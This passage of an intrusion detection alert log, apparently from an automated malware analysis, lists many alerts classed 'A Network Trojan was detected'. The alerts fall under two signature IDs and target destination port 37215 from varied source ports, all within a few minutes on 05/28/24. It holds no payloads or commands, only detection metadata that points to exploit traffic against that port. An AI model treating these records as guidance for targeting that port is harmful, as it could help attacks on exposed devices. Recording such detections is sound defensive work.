          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555255
          SID:2829579
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893286
          SID:2835222
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462951
          SID:2835222
          Source Port:60240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123650
          SID:2829579
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813052
          SID:2835222
          Source Port:42258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963096
          SID:2835222
          Source Port:53308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664082
          SID:2835222
          Source Port:52236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952025
          SID:2835222
          Source Port:40404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223249
          SID:2829579
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422512
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400548
          SID:2835222
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537449
          SID:2835222
          Source Port:52660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669154
          SID:2835222
          Source Port:60474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923822
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652893
          SID:2829579
          Source Port:46218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741488
          SID:2835222
          Source Port:44976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944013
          SID:2829579
          Source Port:43220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168178
          SID:2835222
          Source Port:38272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923504
          SID:2835222
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170183
          SID:2829579
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764701
          SID:2835222
          Source Port:37598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542046
          SID:2835222
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993127
          SID:2829579
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400952
          SID:2835222
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042427
          SID:2835222
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475443
          SID:2835222
          Source Port:52042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614193
          SID:2835222
          Source Port:39360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736000
          SID:2829579
          Source Port:37282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979703
          SID:2829579
          Source Port:59238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328649
          SID:2829579
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772857
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337863
          SID:2829579
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020328
          SID:2829579
          Source Port:34030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655613
          SID:2835222
          Source Port:58502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326136
          SID:2835222
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062829
          SID:2835222
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202948
          SID:2835222
          Source Port:39246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332366
          SID:2835222
          Source Port:55314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621282
          SID:2829579
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297373
          SID:2829579
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559806
          SID:2829579
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215793
          SID:2829579
          Source Port:51714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293129
          SID:2835222
          Source Port:36876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685416
          SID:2835222
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300089
          SID:2835222
          Source Port:41160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653038
          SID:2829579
          Source Port:47910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659077
          SID:2835222
          Source Port:38710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130741
          SID:2835222
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509559
          SID:2829579
          Source Port:57750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727004
          SID:2835222
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980402
          SID:2829579
          Source Port:58648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178959
          SID:2835222
          Source Port:53936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215541
          SID:2835222
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206980
          SID:2835222
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187139
          SID:2829579
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838679
          SID:2829579
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123725
          SID:2829579
          Source Port:39482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265950
          SID:2835222
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474928
          SID:2835222
          Source Port:58386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283423
          SID:2829579
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858299
          SID:2829579
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205349
          SID:2829579
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591276
          SID:2835222
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299068
          SID:2829579
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611617
          SID:2835222
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107194
          SID:2829579
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187375
          SID:2835222
          Source Port:55878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209154
          SID:2835222
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201995
          SID:2835222
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808966
          SID:2835222
          Source Port:44144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090936
          SID:2829579
          Source Port:45996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328814
          SID:2829579
          Source Port:37072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.481766
          SID:2829579
          Source Port:36004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608843
          SID:2835222
          Source Port:55236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803813
          SID:2829579
          Source Port:43424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126811
          SID:2829579
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816053
          SID:2829579
          Source Port:33774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273197
          SID:2835222
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486370
          SID:2835222
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215548
          SID:2835222
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195595
          SID:2829579
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943446
          SID:2829579
          Source Port:36934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338423
          SID:2829579
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332652
          SID:2835222
          Source Port:52834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774812
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668860
          SID:2829579
          Source Port:60796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.696958
          SID:2835222
          Source Port:40372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476196
          SID:2835222
          Source Port:50834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728053
          SID:2835222
          Source Port:38146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960751
          SID:2835222
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685513
          SID:2829579
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033347
          SID:2829579
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465337
          SID:2835222
          Source Port:48868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611313
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475718
          SID:2829579
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680192
          SID:2835222
          Source Port:48212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861499
          SID:2829579
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976661
          SID:2835222
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300948
          SID:2829579
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470680
          SID:2829579
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223960
          SID:2835222
          Source Port:59296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892691
          SID:2835222
          Source Port:57320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767062
          SID:2835222
          Source Port:35476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168303
          SID:2829579
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464007
          SID:2829579
          Source Port:45642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487102
          SID:2829579
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806950
          SID:2835222
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231739
          SID:2835222
          Source Port:33902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553985
          SID:2829579
          Source Port:48962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237068
          SID:2829579
          Source Port:60546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215930
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486805
          SID:2829579
          Source Port:47150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595119
          SID:2835222
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298086
          SID:2835222
          Source Port:43198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841566
          SID:2829579
          Source Port:59536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996626
          SID:2829579
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183104
          SID:2829579
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.363494
          SID:2835222
          Source Port:46958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631676
          SID:2829579
          Source Port:55562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868832
          SID:2835222
          Source Port:52110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466525
          SID:2829579
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.421985
          SID:2835222
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559851
          SID:2835222
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416334
          SID:2835222
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497238
          SID:2835222
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342015
          SID:2829579
          Source Port:34446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008798
          SID:2829579
          Source Port:54612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270495
          SID:2835222
          Source Port:45404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475931
          SID:2829579
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712154
          SID:2829579
          Source Port:34636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399940
          SID:2835222
          Source Port:48166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764475
          SID:2835222
          Source Port:59628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797130
          SID:2835222
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530087
          SID:2835222
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358123
          SID:2835222
          Source Port:47662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938500
          SID:2829579
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805590
          SID:2835222
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305466
          SID:2829579
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009951
          SID:2835222
          Source Port:42886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170641
          SID:2835222
          Source Port:55892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485519
          SID:2835222
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543452
          SID:2829579
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115456
          SID:2829579
          Source Port:37882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822586
          SID:2829579
          Source Port:35822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528335
          SID:2835222
          Source Port:50436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270979
          SID:2835222
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550507
          SID:2835222
          Source Port:57596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215645
          SID:2835222
          Source Port:55390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216362
          SID:2829579
          Source Port:51410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213726
          SID:2835222
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931427
          SID:2835222
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103154
          SID:2829579
          Source Port:56992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943309
          SID:2829579
          Source Port:49140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909209
          SID:2835222
          Source Port:40832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662744
          SID:2835222
          Source Port:47754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147781
          SID:2835222
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270346
          SID:2835222
          Source Port:48576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493130
          SID:2835222
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403133
          SID:2835222
          Source Port:41648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266831
          SID:2829579
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283639
          SID:2835222
          Source Port:51366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565831
          SID:2829579
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659557
          SID:2835222
          Source Port:60362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989136
          SID:2829579
          Source Port:33130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871042
          SID:2835222
          Source Port:59440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135979
          SID:2829579
          Source Port:40392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741813
          SID:2829579
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528263
          SID:2829579
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764046
          SID:2835222
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403127
          SID:2835222
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544128
          SID:2835222
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434844
          SID:2835222
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680655
          SID:2835222
          Source Port:38442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136908
          SID:2829579
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847784
          SID:2829579
          Source Port:48736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491468
          SID:2835222
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743402
          SID:2829579
          Source Port:45116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066008
          SID:2829579
          Source Port:47260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153357
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356976
          SID:2829579
          Source Port:51324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202231
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322926
          SID:2835222
          Source Port:52810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.050833
          SID:2829579
          Source Port:45984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651119
          SID:2835222
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269489
          SID:2835222
          Source Port:54460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594887
          SID:2835222
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317269
          SID:2835222
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772448
          SID:2835222
          Source Port:59760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156467
          SID:2835222
          Source Port:57334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160741
          SID:2835222
          Source Port:32922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953506
          SID:2829579
          Source Port:43872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273221
          SID:2835222
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873839
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217107
          SID:2835222
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116633
          SID:2835222
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739789
          SID:2829579
          Source Port:44036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465175
          SID:2829579
          Source Port:41780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
